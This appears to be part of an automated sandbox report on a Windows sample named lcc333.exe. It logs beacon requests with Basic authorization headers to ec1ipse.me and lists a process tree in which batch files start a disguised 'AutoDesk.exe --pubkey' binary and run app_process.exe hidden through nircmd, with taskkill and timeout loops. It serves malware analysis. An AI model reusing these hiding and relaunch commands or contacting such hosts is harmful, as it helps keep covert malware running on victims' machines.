                                                                                                                                                        2024-11-25 10:12:03 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        42192.168.2.549981172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:12:07 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:12:08 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:07 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:12:08 UTC10INData Raw: 31 37 33 32 35 32 39 35 32 37
                                                                                                                                                        Data Ascii: 1732529527


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        43192.168.2.549982172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:12:07 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:12:08 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:08 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:12:08 UTC10INData Raw: 31 37 33 32 35 32 39 35 32 38
                                                                                                                                                        Data Ascii: 1732529528


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        44192.168.2.549986172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:12:09 UTC378OUTGET /v2/ws?timestamp=1732529527 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: 0dWhl/NTdbOrVDaVKZ/Hdw==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6MkxWRGRZVThZUk1tUWpFMU1HSDZoVEw0ZXF1bjZUWTc2TXlFNWhXQlZqV2pGNlRrcHBLQm5BVVdvcXpCc21RZVdqakdjeHZURTRzYm9KOTNzeTNMMmNqMw==
                                                                                                                                                        2024-11-25 10:12:09 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:09 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:12:09 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        45192.168.2.549987172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:12:09 UTC374OUTGET /v2/ws?timestamp=1732529528 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: SgbzhYTM+TLQu0KGeek80g==
                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86dHdEaDJCMTVjTGZkcmtldkVwRjRTb2pzdlcxam8yY3prb3Y1S0FVSFpEUmIySkJhZmFQelozZ3JMNFFaN1Q4QWFZN0gyWVhUZ3Z0RmsyVlBGb2NQUmZx
                                                                                                                                                        2024-11-25 10:12:09 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:09 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:12:09 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        46192.168.2.549998172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:12:14 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:12:14 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:14 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:12:14 UTC10INData Raw: 31 37 33 32 35 32 39 35 33 34
                                                                                                                                                        Data Ascii: 1732529534


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        47192.168.2.550001172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:12:14 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:12:14 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:14 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:12:14 UTC10INData Raw: 31 37 33 32 35 32 39 35 33 34
                                                                                                                                                        Data Ascii: 1732529534


                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:05:10:11
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\lcc333.exe"
                                                                                                                                                        Imagebase:0x7ff714c80000
                                                                                                                                                        File size:8'547'394 bytes
                                                                                                                                                        MD5 hash:A236CDEC4DD41FB49C3B5AFC64B6F878
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:05:10:12
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\lcc333.exe"
                                                                                                                                                        Imagebase:0x7ff714c80000
                                                                                                                                                        File size:8'547'394 bytes
                                                                                                                                                        MD5 hash:A236CDEC4DD41FB49C3B5AFC64B6F878
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c python.bat
                                                                                                                                                        Imagebase:0x7ff750910000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c play.bat
                                                                                                                                                        Imagebase:0x7ff750910000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\Desktop\lcc333.bat
                                                                                                                                                        Imagebase:0x7ff750910000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:12
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:13
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs"
                                                                                                                                                        Imagebase:0x7ff750910000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:14
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:timeout /t 5
                                                                                                                                                        Imagebase:0x7ff7af6d0000
                                                                                                                                                        File size:32'768 bytes
                                                                                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:15
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\nircmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:nircmd exec hide "app_process.exe"
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:119'808 bytes
                                                                                                                                                        MD5 hash:4A9DA765FD91E80DECFD2C9FE221E842
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 0000000F.00000000.2523657662.0000000140017000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: C:\Windows\System32\nircmd.exe, Author: Joe Security
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 4%, ReversingLabs
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:16
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:17
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:timeout /t 120
                                                                                                                                                        Imagebase:0x7ff7af6d0000
                                                                                                                                                        File size:32'768 bytes
                                                                                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:18
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\app_process.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"app_process.exe"
                                                                                                                                                        Imagebase:0x7ff791a00000
                                                                                                                                                        File size:6'063'616 bytes
                                                                                                                                                        MD5 hash:7226BE407EFCC671016739CAD3D26220
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:19
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\AutoDesk.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs
                                                                                                                                                        Imagebase:0x7ff7a8e50000
                                                                                                                                                        File size:21'075'456 bytes
                                                                                                                                                        MD5 hash:684CBE7FDADD9BE38FBFE427040B2637
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 17%, ReversingLabs
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:20
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:21
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\nircmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:nircmd exec hide "app_process.exe"
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:119'808 bytes
                                                                                                                                                        MD5 hash:4A9DA765FD91E80DECFD2C9FE221E842
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 00000015.00000000.2526970311.0000000140017000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:22
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\app_process.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"app_process.exe"
                                                                                                                                                        Imagebase:0x7ff791a00000
                                                                                                                                                        File size:6'063'616 bytes
                                                                                                                                                        MD5 hash:7226BE407EFCC671016739CAD3D26220
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:23
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:24
                                                                                                                                                        Start time:05:10:53
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:timeout /t 600
                                                                                                                                                        Imagebase:0x7ff7af6d0000
                                                                                                                                                        File size:32'768 bytes
                                                                                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:25
                                                                                                                                                        Start time:05:12:01
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:taskkill /f /im AutoDesk.exe
                                                                                                                                                        Imagebase:0x7ff6e5270000
                                                                                                                                                        File size:101'376 bytes
                                                                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:26
                                                                                                                                                        Start time:05:12:02
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs"
                                                                                                                                                        Imagebase:0x7ff750910000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:27
                                                                                                                                                        Start time:05:12:02
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:28
                                                                                                                                                        Start time:05:12:02
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:timeout /t 120
                                                                                                                                                        Imagebase:0x7ff7af6d0000
                                                                                                                                                        File size:32'768 bytes
                                                                                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:29
                                                                                                                                                        Start time:05:12:02
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\AutoDesk.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs
                                                                                                                                                        Imagebase:0x7ff7a8e50000
                                                                                                                                                        File size:21'075'456 bytes
                                                                                                                                                        MD5 hash:684CBE7FDADD9BE38FBFE427040B2637
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:30
                                                                                                                                                        Start time:05:12:15
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:taskkill /f /im app_process.exe
                                                                                                                                                        Imagebase:0x7ff6e5270000
                                                                                                                                                        File size:101'376 bytes
                                                                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:31
                                                                                                                                                        Start time:05:12:15
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\nircmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:nircmd exec hide "app_process.exe"
                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                        File size:119'808 bytes
                                                                                                                                                        MD5 hash:4A9DA765FD91E80DECFD2C9FE221E842
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 0000001F.00000000.3340727157.0000000140017000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_NirCmd, Description: Yara detected NirCmd tool, Source: 0000001F.00000002.3344008939.0000000140017000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:32
                                                                                                                                                        Start time:05:12:15
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\app_process.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"app_process.exe"
                                                                                                                                                        Imagebase:0x7ff791a00000
                                                                                                                                                        File size:6'063'616 bytes
                                                                                                                                                        MD5 hash:7226BE407EFCC671016739CAD3D26220
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:33
                                                                                                                                                        Start time:05:12:15
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:34
                                                                                                                                                        Start time:05:12:15
                                                                                                                                                        Start date:25/11/2024
                                                                                                                                                        Path:C:\Windows\System32\nircmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:nircmd exec hide "app_process.exe"
